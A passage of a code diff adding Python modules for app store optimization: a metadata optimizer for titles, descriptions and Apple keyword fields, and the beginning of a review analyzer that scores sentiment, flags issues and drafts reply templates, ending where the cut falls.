packages/llm/skills/app-store-optimization/metadata_optimizer.py
Normal file
@ -0,0 +1,581 @@
|
||||
"""
|
||||
Metadata optimization module for App Store Optimization.
|
||||
Optimizes titles, descriptions, and keyword fields with platform-specific character limit validation.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional, Tuple
|
||||
import re
|
||||
|
||||
|
||||
class MetadataOptimizer:
|
||||
"""Optimizes app store metadata for maximum discoverability and conversion."""
|
||||
|
||||
# Platform-specific character limits
|
||||
CHAR_LIMITS = {
|
||||
'apple': {
|
||||
'title': 30,
|
||||
'subtitle': 30,
|
||||
'promotional_text': 170,
|
||||
'description': 4000,
|
||||
'keywords': 100,
|
||||
'whats_new': 4000
|
||||
},
|
||||
'google': {
|
||||
'title': 50,
|
||||
'short_description': 80,
|
||||
'full_description': 4000
|
||||
}
|
||||
}
|
||||
|
||||
def __init__(self, platform: str = 'apple'):
|
||||
"""
|
||||
Initialize metadata optimizer.
|
||||
|
||||
Args:
|
||||
platform: 'apple' or 'google'
|
||||
"""
|
||||
if platform not in ['apple', 'google']:
|
||||
raise ValueError("Platform must be 'apple' or 'google'")
|
||||
|
||||
self.platform = platform
|
||||
self.limits = self.CHAR_LIMITS[platform]
|
||||
|
||||
def optimize_title(
|
||||
self,
|
||||
app_name: str,
|
||||
target_keywords: List[str],
|
||||
include_brand: bool = True
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Optimize app title with keyword integration.
|
||||
|
||||
Args:
|
||||
app_name: Your app's brand name
|
||||
target_keywords: List of keywords to potentially include
|
||||
include_brand: Whether to include brand name
|
||||
|
||||
Returns:
|
||||
Optimized title options with analysis
|
||||
"""
|
||||
max_length = self.limits['title']
|
||||
|
||||
title_options = []
|
||||
|
||||
# Option 1: Brand name only
|
||||
if include_brand:
|
||||
option1 = app_name[:max_length]
|
||||
title_options.append({
|
||||
'title': option1,
|
||||
'length': len(option1),
|
||||
'remaining_chars': max_length - len(option1),
|
||||
'keywords_included': [],
|
||||
'strategy': 'brand_only',
|
||||
'pros': ['Maximum brand recognition', 'Clean and simple'],
|
||||
'cons': ['No keyword targeting', 'Lower discoverability']
|
||||
})
|
||||
|
||||
# Option 2: Brand + Primary Keyword
|
||||
if target_keywords:
|
||||
primary_keyword = target_keywords[0]
|
||||
option2 = self._build_title_with_keywords(
|
||||
app_name,
|
||||
[primary_keyword],
|
||||
max_length
|
||||
)
|
||||
if option2:
|
||||
title_options.append({
|
||||
'title': option2,
|
||||
'length': len(option2),
|
||||
'remaining_chars': max_length - len(option2),
|
||||
'keywords_included': [primary_keyword],
|
||||
'strategy': 'brand_plus_primary',
|
||||
'pros': ['Targets main keyword', 'Maintains brand identity'],
|
||||
'cons': ['Limited keyword coverage']
|
||||
})
|
||||
|
||||
# Option 3: Brand + Multiple Keywords (if space allows)
|
||||
if len(target_keywords) > 1:
|
||||
option3 = self._build_title_with_keywords(
|
||||
app_name,
|
||||
target_keywords[:2],
|
||||
max_length
|
||||
)
|
||||
if option3:
|
||||
title_options.append({
|
||||
'title': option3,
|
||||
'length': len(option3),
|
||||
'remaining_chars': max_length - len(option3),
|
||||
'keywords_included': target_keywords[:2],
|
||||
'strategy': 'brand_plus_multiple',
|
||||
'pros': ['Multiple keyword targets', 'Better discoverability'],
|
||||
'cons': ['May feel cluttered', 'Less brand focus']
|
||||
})
|
||||
|
||||
# Option 4: Keyword-first approach (for new apps)
|
||||
if target_keywords and not include_brand:
|
||||
option4 = " ".join(target_keywords[:2])[:max_length]
|
||||
title_options.append({
|
||||
'title': option4,
|
||||
'length': len(option4),
|
||||
'remaining_chars': max_length - len(option4),
|
||||
'keywords_included': target_keywords[:2],
|
||||
'strategy': 'keyword_first',
|
||||
'pros': ['Maximum SEO benefit', 'Clear functionality'],
|
||||
'cons': ['No brand recognition', 'Generic appearance']
|
||||
})
|
||||
|
||||
return {
|
||||
'platform': self.platform,
|
||||
'max_length': max_length,
|
||||
'options': title_options,
|
||||
'recommendation': self._recommend_title_option(title_options)
|
||||
}
|
||||
|
||||
def optimize_description(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
target_keywords: List[str],
|
||||
description_type: str = 'full'
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Optimize app description with keyword integration and conversion focus.
|
||||
|
||||
Args:
|
||||
app_info: Dict with 'name', 'key_features', 'unique_value', 'target_audience'
|
||||
target_keywords: List of keywords to integrate naturally
|
||||
description_type: 'full', 'short' (Google), 'subtitle' (Apple)
|
||||
|
||||
Returns:
|
||||
Optimized description with analysis
|
||||
"""
|
||||
if description_type == 'short' and self.platform == 'google':
|
||||
return self._optimize_short_description(app_info, target_keywords)
|
||||
elif description_type == 'subtitle' and self.platform == 'apple':
|
||||
return self._optimize_subtitle(app_info, target_keywords)
|
||||
else:
|
||||
return self._optimize_full_description(app_info, target_keywords)
|
||||
|
||||
def optimize_keyword_field(
|
||||
self,
|
||||
target_keywords: List[str],
|
||||
app_title: str = "",
|
||||
app_description: str = ""
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Optimize Apple's 100-character keyword field.
|
||||
|
||||
Rules:
|
||||
- No spaces between commas
|
||||
- No plural forms if singular exists
|
||||
- No duplicates
|
||||
- Keywords in title/subtitle are already indexed
|
||||
|
||||
Args:
|
||||
target_keywords: List of target keywords
|
||||
app_title: Current app title (to avoid duplication)
|
||||
app_description: Current description (to check coverage)
|
||||
|
||||
Returns:
|
||||
Optimized keyword field (comma-separated, no spaces)
|
||||
"""
|
||||
if self.platform != 'apple':
|
||||
return {'error': 'Keyword field optimization only applies to Apple App Store'}
|
||||
|
||||
max_length = self.limits['keywords']
|
||||
|
||||
# Extract words already in title (these don't need to be in keyword field)
|
||||
title_words = set(app_title.lower().split()) if app_title else set()
|
||||
|
||||
# Process keywords
|
||||
processed_keywords = []
|
||||
for keyword in target_keywords:
|
||||
keyword_lower = keyword.lower().strip()
|
||||
|
||||
# Skip if already in title
|
||||
if keyword_lower in title_words:
|
||||
continue
|
||||
|
||||
# Remove duplicates and process
|
||||
words = keyword_lower.split()
|
||||
for word in words:
|
||||
if word not in processed_keywords and word not in title_words:
|
||||
processed_keywords.append(word)
|
||||
|
||||
# Remove plurals if singular exists
|
||||
deduplicated = self._remove_plural_duplicates(processed_keywords)
|
||||
|
||||
# Build keyword field within 100 character limit
|
||||
keyword_field = self._build_keyword_field(deduplicated, max_length)
|
||||
|
||||
# Calculate keyword density in description
|
||||
density = self._calculate_coverage(target_keywords, app_description)
|
||||
|
||||
return {
|
||||
'keyword_field': keyword_field,
|
||||
'length': len(keyword_field),
|
||||
'remaining_chars': max_length - len(keyword_field),
|
||||
'keywords_included': keyword_field.split(','),
|
||||
'keywords_count': len(keyword_field.split(',')),
|
||||
'keywords_excluded': [kw for kw in target_keywords if kw.lower() not in keyword_field],
|
||||
'description_coverage': density,
|
||||
'optimization_tips': [
|
||||
'Keywords in title are auto-indexed - no need to repeat',
|
||||
'Use singular forms only (Apple indexes plurals automatically)',
|
||||
'No spaces between commas to maximize character usage',
|
||||
'Update keyword field with each app update to test variations'
|
||||
]
|
||||
}
|
||||
|
||||
def validate_character_limits(
|
||||
self,
|
||||
metadata: Dict[str, str]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Validate all metadata fields against platform character limits.
|
||||
|
||||
Args:
|
||||
metadata: Dictionary of field_name: value
|
||||
|
||||
Returns:
|
||||
Validation report with errors and warnings
|
||||
"""
|
||||
validation_results = {
|
||||
'is_valid': True,
|
||||
'errors': [],
|
||||
'warnings': [],
|
||||
'field_status': {}
|
||||
}
|
||||
|
||||
for field_name, value in metadata.items():
|
||||
if field_name not in self.limits:
|
||||
validation_results['warnings'].append(
|
||||
f"Unknown field '{field_name}' for {self.platform} platform"
|
||||
)
|
||||
continue
|
||||
|
||||
max_length = self.limits[field_name]
|
||||
actual_length = len(value)
|
||||
remaining = max_length - actual_length
|
||||
|
||||
field_status = {
|
||||
'value': value,
|
||||
'length': actual_length,
|
||||
'limit': max_length,
|
||||
'remaining': remaining,
|
||||
'is_valid': actual_length <= max_length,
|
||||
'usage_percentage': round((actual_length / max_length) * 100, 1)
|
||||
}
|
||||
|
||||
validation_results['field_status'][field_name] = field_status
|
||||
|
||||
if actual_length > max_length:
|
||||
validation_results['is_valid'] = False
|
||||
validation_results['errors'].append(
|
||||
f"'{field_name}' exceeds limit: {actual_length}/{max_length} chars"
|
||||
)
|
||||
elif remaining > max_length * 0.2: # More than 20% unused
|
||||
validation_results['warnings'].append(
|
||||
f"'{field_name}' under-utilizes space: {remaining} chars remaining"
|
||||
)
|
||||
|
||||
return validation_results
|
||||
|
||||
def calculate_keyword_density(
|
||||
self,
|
||||
text: str,
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Calculate keyword density in text.
|
||||
|
||||
Args:
|
||||
text: Text to analyze
|
||||
target_keywords: Keywords to check
|
||||
|
||||
Returns:
|
||||
Density analysis
|
||||
"""
|
||||
text_lower = text.lower()
|
||||
total_words = len(text_lower.split())
|
||||
|
||||
keyword_densities = {}
|
||||
for keyword in target_keywords:
|
||||
keyword_lower = keyword.lower()
|
||||
count = text_lower.count(keyword_lower)
|
||||
density = (count / total_words * 100) if total_words > 0 else 0
|
||||
|
||||
keyword_densities[keyword] = {
|
||||
'occurrences': count,
|
||||
'density_percentage': round(density, 2),
|
||||
'status': self._assess_density(density)
|
||||
}
|
||||
|
||||
# Overall assessment
|
||||
total_keyword_occurrences = sum(kw['occurrences'] for kw in keyword_densities.values())
|
||||
overall_density = (total_keyword_occurrences / total_words * 100) if total_words > 0 else 0
|
||||
|
||||
return {
|
||||
'total_words': total_words,
|
||||
'keyword_densities': keyword_densities,
|
||||
'overall_keyword_density': round(overall_density, 2),
|
||||
'assessment': self._assess_overall_density(overall_density),
|
||||
'recommendations': self._generate_density_recommendations(keyword_densities)
|
||||
}
|
||||
|
||||
def _build_title_with_keywords(
|
||||
self,
|
||||
app_name: str,
|
||||
keywords: List[str],
|
||||
max_length: int
|
||||
) -> Optional[str]:
|
||||
"""Build title combining app name and keywords within limit."""
|
||||
separators = [' - ', ': ', ' | ']
|
||||
|
||||
for sep in separators:
|
||||
for kw in keywords:
|
||||
title = f"{app_name}{sep}{kw}"
|
||||
if len(title) <= max_length:
|
||||
return title
|
||||
|
||||
return None
|
||||
|
||||
def _optimize_short_description(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""Optimize Google Play short description (80 chars)."""
|
||||
max_length = self.limits['short_description']
|
||||
|
||||
# Focus on unique value proposition with primary keyword
|
||||
unique_value = app_info.get('unique_value', '')
|
||||
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||
|
||||
# Template: [Primary Keyword] - [Unique Value]
|
||||
short_desc = f"{primary_keyword.title()} - {unique_value}"[:max_length]
|
||||
|
||||
return {
|
||||
'short_description': short_desc,
|
||||
'length': len(short_desc),
|
||||
'remaining_chars': max_length - len(short_desc),
|
||||
'keywords_included': [primary_keyword] if primary_keyword in short_desc.lower() else [],
|
||||
'strategy': 'keyword_value_proposition'
|
||||
}
|
||||
|
||||
def _optimize_subtitle(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""Optimize Apple App Store subtitle (30 chars)."""
|
||||
max_length = self.limits['subtitle']
|
||||
|
||||
# Very concise - primary keyword or key feature
|
||||
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||
key_feature = app_info.get('key_features', [''])[0] if app_info.get('key_features') else ''
|
||||
|
||||
options = [
|
||||
primary_keyword[:max_length],
|
||||
key_feature[:max_length],
|
||||
f"{primary_keyword} App"[:max_length]
|
||||
]
|
||||
|
||||
return {
|
||||
'subtitle_options': [opt for opt in options if opt],
|
||||
'max_length': max_length,
|
||||
'recommendation': options[0] if options else ''
|
||||
}
|
||||
|
||||
def _optimize_full_description(
|
||||
self,
|
||||
app_info: Dict[str, Any],
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""Optimize full app description (4000 chars for both platforms)."""
|
||||
max_length = self.limits.get('description', self.limits.get('full_description', 4000))
|
||||
|
||||
# Structure: Hook → Features → Benefits → Social Proof → CTA
|
||||
sections = []
|
||||
|
||||
# Hook (with primary keyword)
|
||||
primary_keyword = target_keywords[0] if target_keywords else ''
|
||||
unique_value = app_info.get('unique_value', '')
|
||||
hook = f"{unique_value} {primary_keyword.title()} that helps you achieve more.\n\n"
|
||||
sections.append(hook)
|
||||
|
||||
# Features (with keywords naturally integrated)
|
||||
features = app_info.get('key_features', [])
|
||||
if features:
|
||||
sections.append("KEY FEATURES:\n")
|
||||
for i, feature in enumerate(features[:5], 1):
|
||||
# Integrate keywords naturally
|
||||
feature_text = f"• {feature}"
|
||||
if i <= len(target_keywords):
|
||||
keyword = target_keywords[i-1]
|
||||
if keyword.lower() not in feature.lower():
|
||||
feature_text = f"• {feature} with {keyword}"
|
||||
sections.append(f"{feature_text}\n")
|
||||
sections.append("\n")
|
||||
|
||||
# Benefits
|
||||
target_audience = app_info.get('target_audience', 'users')
|
||||
sections.append(f"PERFECT FOR:\n{target_audience}\n\n")
|
||||
|
||||
# Social proof placeholder
|
||||
sections.append("WHY USERS LOVE US:\n")
|
||||
sections.append("Join thousands of satisfied users who have transformed their workflow.\n\n")
|
||||
|
||||
# CTA
|
||||
sections.append("Download now and start experiencing the difference!")
|
||||
|
||||
# Combine and validate length
|
||||
full_description = "".join(sections)
|
||||
if len(full_description) > max_length:
|
||||
full_description = full_description[:max_length-3] + "..."
|
||||
|
||||
# Calculate keyword density
|
||||
density = self.calculate_keyword_density(full_description, target_keywords)
|
||||
|
||||
return {
|
||||
'full_description': full_description,
|
||||
'length': len(full_description),
|
||||
'remaining_chars': max_length - len(full_description),
|
||||
'keyword_analysis': density,
|
||||
'structure': {
|
||||
'has_hook': True,
|
||||
'has_features': len(features) > 0,
|
||||
'has_benefits': True,
|
||||
'has_cta': True
|
||||
}
|
||||
}
|
||||
|
||||
def _remove_plural_duplicates(self, keywords: List[str]) -> List[str]:
|
||||
"""Remove plural forms if singular exists."""
|
||||
deduplicated = []
|
||||
singular_set = set()
|
||||
|
||||
for keyword in keywords:
|
||||
if keyword.endswith('s') and len(keyword) > 1:
|
||||
singular = keyword[:-1]
|
||||
if singular not in singular_set:
|
||||
deduplicated.append(singular)
|
||||
singular_set.add(singular)
|
||||
else:
|
||||
if keyword not in singular_set:
|
||||
deduplicated.append(keyword)
|
||||
singular_set.add(keyword)
|
||||
|
||||
return deduplicated
|
||||
|
||||
def _build_keyword_field(self, keywords: List[str], max_length: int) -> str:
|
||||
"""Build comma-separated keyword field within character limit."""
|
||||
keyword_field = ""
|
||||
|
||||
for keyword in keywords:
|
||||
test_field = f"{keyword_field},{keyword}" if keyword_field else keyword
|
||||
if len(test_field) <= max_length:
|
||||
keyword_field = test_field
|
||||
else:
|
||||
break
|
||||
|
||||
return keyword_field
|
||||
|
||||
def _calculate_coverage(self, keywords: List[str], text: str) -> Dict[str, int]:
|
||||
"""Calculate how many keywords are covered in text."""
|
||||
text_lower = text.lower()
|
||||
coverage = {}
|
||||
|
||||
for keyword in keywords:
|
||||
coverage[keyword] = text_lower.count(keyword.lower())
|
||||
|
||||
return coverage
|
||||
|
||||
def _assess_density(self, density: float) -> str:
|
||||
"""Assess individual keyword density."""
|
||||
if density < 0.5:
|
||||
return "too_low"
|
||||
elif density <= 2.5:
|
||||
return "optimal"
|
||||
else:
|
||||
return "too_high"
|
||||
|
||||
def _assess_overall_density(self, density: float) -> str:
|
||||
"""Assess overall keyword density."""
|
||||
if density < 2:
|
||||
return "Under-optimized: Consider adding more keyword variations"
|
||||
elif density <= 5:
|
||||
return "Optimal: Good keyword integration without stuffing"
|
||||
elif density <= 8:
|
||||
return "High: Approaching keyword stuffing - reduce keyword usage"
|
||||
else:
|
||||
return "Too High: Keyword stuffing detected - rewrite for natural flow"
|
||||
|
||||
def _generate_density_recommendations(
|
||||
self,
|
||||
keyword_densities: Dict[str, Dict[str, Any]]
|
||||
) -> List[str]:
|
||||
"""Generate recommendations based on keyword density analysis."""
|
||||
recommendations = []
|
||||
|
||||
for keyword, data in keyword_densities.items():
|
||||
if data['status'] == 'too_low':
|
||||
recommendations.append(
|
||||
f"Increase usage of '{keyword}' - currently only {data['occurrences']} times"
|
||||
)
|
||||
elif data['status'] == 'too_high':
|
||||
recommendations.append(
|
||||
f"Reduce usage of '{keyword}' - appears {data['occurrences']} times (keyword stuffing risk)"
|
||||
)
|
||||
|
||||
if not recommendations:
|
||||
recommendations.append("Keyword density is well-balanced")
|
||||
|
||||
return recommendations
|
||||
|
||||
def _recommend_title_option(self, options: List[Dict[str, Any]]) -> str:
|
||||
"""Recommend best title option based on strategy."""
|
||||
if not options:
|
||||
return "No valid options available"
|
||||
|
||||
# Prefer brand_plus_primary for established apps
|
||||
for option in options:
|
||||
if option['strategy'] == 'brand_plus_primary':
|
||||
return f"Recommended: '{option['title']}' (Balance of brand and SEO)"
|
||||
|
||||
# Fallback to first option
|
||||
return f"Recommended: '{options[0]['title']}' ({options[0]['strategy']})"
|
||||
|
||||
|
||||
def optimize_app_metadata(
|
||||
platform: str,
|
||||
app_info: Dict[str, Any],
|
||||
target_keywords: List[str]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Convenience function to optimize all metadata fields.
|
||||
|
||||
Args:
|
||||
platform: 'apple' or 'google'
|
||||
app_info: App information dictionary
|
||||
target_keywords: Target keywords list
|
||||
|
||||
Returns:
|
||||
Complete metadata optimization package
|
||||
"""
|
||||
optimizer = MetadataOptimizer(platform)
|
||||
|
||||
return {
|
||||
'platform': platform,
|
||||
'title': optimizer.optimize_title(
|
||||
app_info['name'],
|
||||
target_keywords
|
||||
),
|
||||
'description': optimizer.optimize_description(
|
||||
app_info,
|
||||
target_keywords,
|
||||
'full'
|
||||
),
|
||||
'keyword_field': optimizer.optimize_keyword_field(
|
||||
target_keywords
|
||||
) if platform == 'apple' else None
|
||||
}
|
||||
714
packages/llm/skills/app-store-optimization/review_analyzer.py
Normal file
714
packages/llm/skills/app-store-optimization/review_analyzer.py
Normal file
@ -0,0 +1,714 @@
|
||||
"""
|
||||
Review analysis module for App Store Optimization.
|
||||
Analyzes user reviews for sentiment, issues, and feature requests.
|
||||
"""
|
||||
|
||||
from typing import Dict, List, Any, Optional, Tuple
|
||||
from collections import Counter
|
||||
import re
|
||||
|
||||
|
||||
class ReviewAnalyzer:
|
||||
"""Analyzes user reviews for actionable insights."""
|
||||
|
||||
# Sentiment keywords
|
||||
POSITIVE_KEYWORDS = [
|
||||
'great', 'awesome', 'excellent', 'amazing', 'love', 'best', 'perfect',
|
||||
'fantastic', 'wonderful', 'brilliant', 'outstanding', 'superb'
|
||||
]
|
||||
|
||||
NEGATIVE_KEYWORDS = [
|
||||
'bad', 'terrible', 'awful', 'horrible', 'hate', 'worst', 'useless',
|
||||
'broken', 'crash', 'bug', 'slow', 'disappointing', 'frustrating'
|
||||
]
|
||||
|
||||
# Issue indicators
|
||||
ISSUE_KEYWORDS = [
|
||||
'crash', 'bug', 'error', 'broken', 'not working', 'doesnt work',
|
||||
'freezes', 'slow', 'laggy', 'glitch', 'problem', 'issue', 'fail'
|
||||
]
|
||||
|
||||
# Feature request indicators
|
||||
FEATURE_REQUEST_KEYWORDS = [
|
||||
'wish', 'would be nice', 'should add', 'need', 'want', 'hope',
|
||||
'please add', 'missing', 'lacks', 'feature request'
|
||||
]
|
||||
|
||||
def __init__(self, app_name: str):
|
||||
"""
|
||||
Initialize review analyzer.
|
||||
|
||||
Args:
|
||||
app_name: Name of the app
|
||||
"""
|
||||
self.app_name = app_name
|
||||
self.reviews = []
|
||||
self.analysis_cache = {}
|
||||
|
||||
def analyze_sentiment(
|
||||
self,
|
||||
reviews: List[Dict[str, Any]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Analyze sentiment across reviews.
|
||||
|
||||
Args:
|
||||
reviews: List of review dicts with 'text', 'rating', 'date'
|
||||
|
||||
Returns:
|
||||
Sentiment analysis summary
|
||||
"""
|
||||
self.reviews = reviews
|
||||
|
||||
sentiment_counts = {
|
||||
'positive': 0,
|
||||
'neutral': 0,
|
||||
'negative': 0
|
||||
}
|
||||
|
||||
detailed_sentiments = []
|
||||
|
||||
for review in reviews:
|
||||
text = review.get('text', '').lower()
|
||||
rating = review.get('rating', 3)
|
||||
|
||||
# Calculate sentiment score
|
||||
sentiment_score = self._calculate_sentiment_score(text, rating)
|
||||
sentiment_category = self._categorize_sentiment(sentiment_score)
|
||||
|
||||
sentiment_counts[sentiment_category] += 1
|
||||
|
||||
detailed_sentiments.append({
|
||||
'review_id': review.get('id', ''),
|
||||
'rating': rating,
|
||||
'sentiment_score': sentiment_score,
|
||||
'sentiment': sentiment_category,
|
||||
'text_preview': text[:100] + '...' if len(text) > 100 else text
|
||||
})
|
||||
|
||||
# Calculate percentages
|
||||
total = len(reviews)
|
||||
sentiment_distribution = {
|
||||
'positive': round((sentiment_counts['positive'] / total) * 100, 1) if total > 0 else 0,
|
||||
'neutral': round((sentiment_counts['neutral'] / total) * 100, 1) if total > 0 else 0,
|
||||
'negative': round((sentiment_counts['negative'] / total) * 100, 1) if total > 0 else 0
|
||||
}
|
||||
|
||||
# Calculate average rating
|
||||
avg_rating = sum(r.get('rating', 0) for r in reviews) / total if total > 0 else 0
|
||||
|
||||
return {
|
||||
'total_reviews_analyzed': total,
|
||||
'average_rating': round(avg_rating, 2),
|
||||
'sentiment_distribution': sentiment_distribution,
|
||||
'sentiment_counts': sentiment_counts,
|
||||
'sentiment_trend': self._assess_sentiment_trend(sentiment_distribution),
|
||||
'detailed_sentiments': detailed_sentiments[:50] # Limit output
|
||||
}
|
||||
|
||||
def extract_common_themes(
|
||||
self,
|
||||
reviews: List[Dict[str, Any]],
|
||||
min_mentions: int = 3
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Extract frequently mentioned themes and topics.
|
||||
|
||||
Args:
|
||||
reviews: List of review dicts
|
||||
min_mentions: Minimum mentions to be considered common
|
||||
|
||||
Returns:
|
||||
Common themes analysis
|
||||
"""
|
||||
# Extract all words from reviews
|
||||
all_words = []
|
||||
all_phrases = []
|
||||
|
||||
for review in reviews:
|
||||
text = review.get('text', '').lower()
|
||||
# Clean text
|
||||
text = re.sub(r'[^\w\s]', ' ', text)
|
||||
words = text.split()
|
||||
|
||||
# Filter out common words
|
||||
stop_words = {
|
||||
'the', 'and', 'for', 'with', 'this', 'that', 'from', 'have',
|
||||
'app', 'apps', 'very', 'really', 'just', 'but', 'not', 'you'
|
||||
}
|
||||
words = [w for w in words if w not in stop_words and len(w) > 3]
|
||||
|
||||
all_words.extend(words)
|
||||
|
||||
# Extract 2-3 word phrases
|
||||
for i in range(len(words) - 1):
|
||||
phrase = f"{words[i]} {words[i+1]}"
|
||||
all_phrases.append(phrase)
|
||||
|
||||
# Count frequency
|
||||
word_freq = Counter(all_words)
|
||||
phrase_freq = Counter(all_phrases)
|
||||
|
||||
# Filter by min_mentions
|
||||
common_words = [
|
||||
{'word': word, 'mentions': count}
|
||||
for word, count in word_freq.most_common(30)
|
||||
if count >= min_mentions
|
||||
]
|
||||
|
||||
common_phrases = [
|
||||
{'phrase': phrase, 'mentions': count}
|
||||
for phrase, count in phrase_freq.most_common(20)
|
||||
if count >= min_mentions
|
||||
]
|
||||
|
||||
# Categorize themes
|
||||
themes = self._categorize_themes(common_words, common_phrases)
|
||||
|
||||
return {
|
||||
'common_words': common_words,
|
||||
'common_phrases': common_phrases,
|
||||
'identified_themes': themes,
|
||||
'insights': self._generate_theme_insights(themes)
|
||||
}
|
||||
|
||||
def identify_issues(
|
||||
self,
|
||||
reviews: List[Dict[str, Any]],
|
||||
rating_threshold: int = 3
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Identify bugs, crashes, and other issues from reviews.
|
||||
|
||||
Args:
|
||||
reviews: List of review dicts
|
||||
rating_threshold: Only analyze reviews at or below this rating
|
||||
|
||||
Returns:
|
||||
Issue identification report
|
||||
"""
|
||||
issues = []
|
||||
|
||||
for review in reviews:
|
||||
rating = review.get('rating', 5)
|
||||
if rating > rating_threshold:
|
||||
continue
|
||||
|
||||
text = review.get('text', '').lower()
|
||||
|
||||
# Check for issue keywords
|
||||
mentioned_issues = []
|
||||
for keyword in self.ISSUE_KEYWORDS:
|
||||
if keyword in text:
|
||||
mentioned_issues.append(keyword)
|
||||
|
||||
if mentioned_issues:
|
||||
issues.append({
|
||||
'review_id': review.get('id', ''),
|
||||
'rating': rating,
|
||||
'date': review.get('date', ''),
|
||||
'issue_keywords': mentioned_issues,
|
||||
'text': text[:200] + '...' if len(text) > 200 else text
|
||||
})
|
||||
|
||||
# Group by issue type
|
||||
issue_frequency = Counter()
|
||||
for issue in issues:
|
||||
for keyword in issue['issue_keywords']:
|
||||
issue_frequency[keyword] += 1
|
||||
|
||||
# Categorize issues
|
||||
categorized_issues = self._categorize_issues(issues)
|
||||
|
||||
# Calculate issue severity
|
||||
severity_scores = self._calculate_issue_severity(
|
||||
categorized_issues,
|
||||
len(reviews)
|
||||
)
|
||||
|
||||
return {
|
||||
'total_issues_found': len(issues),
|
||||
'issue_frequency': dict(issue_frequency.most_common(15)),
|
||||
'categorized_issues': categorized_issues,
|
||||
'severity_scores': severity_scores,
|
||||
'top_issues': self._rank_issues_by_severity(severity_scores),
|
||||
'recommendations': self._generate_issue_recommendations(
|
||||
categorized_issues,
|
||||
severity_scores
|
||||
)
|
||||
}
|
||||
|
||||
def find_feature_requests(
|
||||
self,
|
||||
reviews: List[Dict[str, Any]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Extract feature requests and desired improvements.
|
||||
|
||||
Args:
|
||||
reviews: List of review dicts
|
||||
|
||||
Returns:
|
||||
Feature request analysis
|
||||
"""
|
||||
feature_requests = []
|
||||
|
||||
for review in reviews:
|
||||
text = review.get('text', '').lower()
|
||||
rating = review.get('rating', 3)
|
||||
|
||||
# Check for feature request indicators
|
||||
is_feature_request = any(
|
||||
keyword in text
|
||||
for keyword in self.FEATURE_REQUEST_KEYWORDS
|
||||
)
|
||||
|
||||
if is_feature_request:
|
||||
# Extract the specific request
|
||||
request_text = self._extract_feature_request_text(text)
|
||||
|
||||
feature_requests.append({
|
||||
'review_id': review.get('id', ''),
|
||||
'rating': rating,
|
||||
'date': review.get('date', ''),
|
||||
'request_text': request_text,
|
||||
'full_review': text[:200] + '...' if len(text) > 200 else text
|
||||
})
|
||||
|
||||
# Cluster similar requests
|
||||
clustered_requests = self._cluster_feature_requests(feature_requests)
|
||||
|
||||
# Prioritize based on frequency and rating context
|
||||
prioritized_requests = self._prioritize_feature_requests(clustered_requests)
|
||||
|
||||
return {
|
||||
'total_feature_requests': len(feature_requests),
|
||||
'clustered_requests': clustered_requests,
|
||||
'prioritized_requests': prioritized_requests,
|
||||
'implementation_recommendations': self._generate_feature_recommendations(
|
||||
prioritized_requests
|
||||
)
|
||||
}
|
||||
|
||||
def track_sentiment_trends(
|
||||
self,
|
||||
reviews_by_period: Dict[str, List[Dict[str, Any]]]
|
||||
) -> Dict[str, Any]:
|
||||
"""
|
||||
Track sentiment changes over time.
|
||||
|
||||
Args:
|
||||
reviews_by_period: Dict of period_name: reviews
|
||||
|
||||
Returns:
|
||||
Trend analysis
|
||||
"""
|
||||
trends = []
|
||||
|
||||
for period, reviews in reviews_by_period.items():
|
||||
sentiment = self.analyze_sentiment(reviews)
|
||||
|
||||
trends.append({
|
||||
'period': period,
|
||||
'total_reviews': len(reviews),
|
||||
'average_rating': sentiment['average_rating'],
|
||||
'positive_percentage': sentiment['sentiment_distribution']['positive'],
|
||||
'negative_percentage': sentiment['sentiment_distribution']['negative']
|
||||
})
|
||||
|
||||
# Calculate trend direction
|
||||
if len(trends) >= 2:
|
||||
first_period = trends[0]
|
||||
last_period = trends[-1]
|
||||
|
||||
rating_change = last_period['average_rating'] - first_period['average_rating']
|
||||
sentiment_change = last_period['positive_percentage'] - first_period['positive_percentage']
|
||||
|
||||
trend_direction = self._determine_trend_direction(
|
||||
rating_change,
|
||||
sentiment_change
|
||||
)
|
||||
else:
|
||||
trend_direction = 'insufficient_data'
|
||||
|
||||
return {
|
||||
'periods_analyzed': len(trends),
|
||||
'trend_data': trends,
|
||||
'trend_direction': trend_direction,
|
||||
'insights': self._generate_trend_insights(trends, trend_direction)
|
||||
}
|
||||
|
||||
def generate_response_templates(
|
||||
self,
|
||||
issue_category: str
|
||||
) -> List[Dict[str, str]]:
|
||||
"""
|
||||
Generate response templates for common review scenarios.
|
||||
|
||||
Args:
|
||||
issue_category: Category of issue ('crash', 'feature_request', 'positive', etc.)
|
||||
|
||||
Returns:
|
||||
Response templates
|
||||
"""
|
||||
templates = {
|
||||
'crash': [
|
||||
{
|
||||
'scenario': 'App crash reported',
|
||||
'template': "Thank you for bringing this to our attention. We're sorry you experienced a crash. "
|
||||
"Our team is investigating this issue. Could you please share more details about when "
|
||||
"this occurred (device model, iOS/Android version) by contacting support@[company].com? "
|
||||
"We're committed to fixing this quickly."
|
||||
},
|
||||
{
|
||||
'scenario': 'Crash already fixed',
|
||||
'template': "Thank you for your feedback. We've identified and fixed this crash issue in version [X.X]. "
|
||||
"Please update to the latest version. If the problem persists, please reach out to "
|
||||
"support@[company].com and we'll help you directly."
|
||||
}
|
||||
],
|
||||
'bug': [
|
||||
{
|
||||
'scenario': 'Bug reported',
|
||||
'template': "Thanks for reporting this bug. We take these issues seriously. Our team is looking into it "
